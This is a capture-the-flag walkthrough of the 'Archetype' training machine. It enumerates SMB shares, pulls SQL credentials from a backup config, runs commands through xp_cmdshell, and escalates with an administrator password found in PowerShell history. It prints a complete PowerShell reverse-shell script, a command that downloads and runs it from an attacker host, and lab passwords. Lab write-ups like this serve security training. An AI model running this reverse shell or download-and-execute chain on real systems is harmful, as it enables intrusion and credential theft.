ARCHETYPE

10.10.10.27

Personal Remark: I thought this box was more challenging than noted. I had plenty of problems getting a successful reverse shell since there was some sort of defender software stopping certain functionalities. I also struggled to get a reverse shell that was interactive and stable. Ignoring these points, it also required knowledge of existing libraries like Impacket.

Recon

First let's check if the box in reachable using ping.

ping 10.10.10.27

PING 10.10.10.27 (10.10.10.27) 56(84) bytes of data.
64 bytes from 10.10.10.27: icmp_seq=1 ttl=127 time=27.6 ms

It is reachable so nmap the target and get all its open information.

nmap-auto 10.10.10.27 all

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
|   Target_Name: ARCHETYPE
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h48m32s, deviation: 3h07m52s, median: 24m31s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)

The most notable information here is the existence of a smb service as noted by the Windows Server 2019 Standard 17763 under the smb-os-discovery. This pairs up with the open 139 and 445 ports. This leads me to believe this box has existent samba vulnerabilities. There is also a known port for SQL servers, 1433, which uses the Microsoft SQL Server 2017, so there is a possibility this could be useful too.

Enumeration

nmap -Pn -T4 --script smb-vuln* -p 139,445 10.10.10.27

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

We found one likely vulnerability: CVE-2008-4250. This is a vulnerability that allows remote attackers to execute arbitrary code via a crafted RPC request that triggers an overflow during path canonicalization. Let's find a usable exploit that we can follow. This path ended up being a dead end.

nmap -Pn -T4 --script=smb-enum-shares.nse -p 445 10.10.10.27

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.27\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.27\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.27\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.27\backups: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: READ
|_    Current user access: READ

This shows that there are 4 shares on the smb service:

• ADMIN$

• C$

• IPC$

• backups

Also, the share \\10.10.10.27\IPC$ has READ/WRITE privileges as anonymous and the current user. It's possible to log in to that share using the following smbclient command: smbclient //10.10.10.27/IPC$ -U guest. The share \\10.10.10.27\backups also has READ access. Logging into it with a similar command smbclient //10.10.10.27/backups -U guest shows me that there is a file in it. Get it with the command get prod.dtsConfig. It contains the following:

prod.dtsConfig

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

It has the following critical information for DTS configuration: 1. User ID: ARCHETYPE\sql_svc 2. Password: M3g4c0rp123

Exploitation

A dtsConfig file is an XML file used to apply property values to SQL Server Integration Services packages. So maybe it can log us into the SQL server. To access the server as a client, there is [Impacket](https://github.com/SecureAuthCorp/impacket) which is a collection of Python classes for working with network protocols. The specific script is [mssqlclient.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). This can be found on the Kali box at "/usr/local/bin/" or in the "usr/share/doc/python3-impacket/examples" folder.

mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

Within the mssql client, test the grounds:

SQL> help
     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> reconfigure

SQL> xp_cmdshell whoami
archetype\sql_svc

SQL> xp_cmdshell cd
C:\Windoes\system32

SQL> xp_cmdshell type c:\users\sql_svc\desktop\user.txt
3e7b102e78218e935bf3f4951fec21a3

Enabling the xp_cmdshell allows the execution of windows commands from the sql server. Using the command whoami shows that the logged in user is sql_svc. Doing a little searching shows the 'user.txt'.

user.txt: 3e7b102e78218e935bf3f4951fec21a3

An xp_cmdshell is great and all, but it's not a legit shell. That means the next step is gaining a legit shell. Powershell is a nice and easy way to create a reverse shell. Edit the listening host and port of the following script and execute it on the windows box:

$socket = new-object System.Net.Sockets.TcpClient('10.10.14.18', 9000);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
	$writer.Write("> ");
	$writer.Flush();
	$read = $null;
	while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}	
	$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
	if(!$out.equals("exit")){
		$out = $out.split(' ')
	        $res = [string](&$out[0] $out[1..$out.length]);
		if($res -ne $null){ $writer.WriteLine($res)}
	}
}While (!$out.equals("exit"))
$writer.close();$socket.close();

To get it to execute on the windows box, do the following:

1. Host the file on a python webserver: python -m SImpleHTTPServer 80

2. Create a netcat listener on the host machine: nc -nvlp 9000

3. Use powershell to execute it remotely:

SQL> xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\"http://10.10.14.18/shell.ps1\")

If this went smoothly, the netcat listener should have caught a shell.

Privilege Escalation

The next step is to escalate to administrator. Searching through important files, credentials can be found in the powershell command history:

type c:\users\sql_svc\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt

consolehost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit

Credentials for administrator: Username: administrator Password: MEGACORP_4dm1n!!

Using another Impacket tool, [psexec.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py), it's possible to login remotely through the open smb service.

Now that there's an interactive administrator shell, anything is possible! Navigating to the administrator folder shows root.txt.

root.txt: b91ccec3305e98240082d4474b848528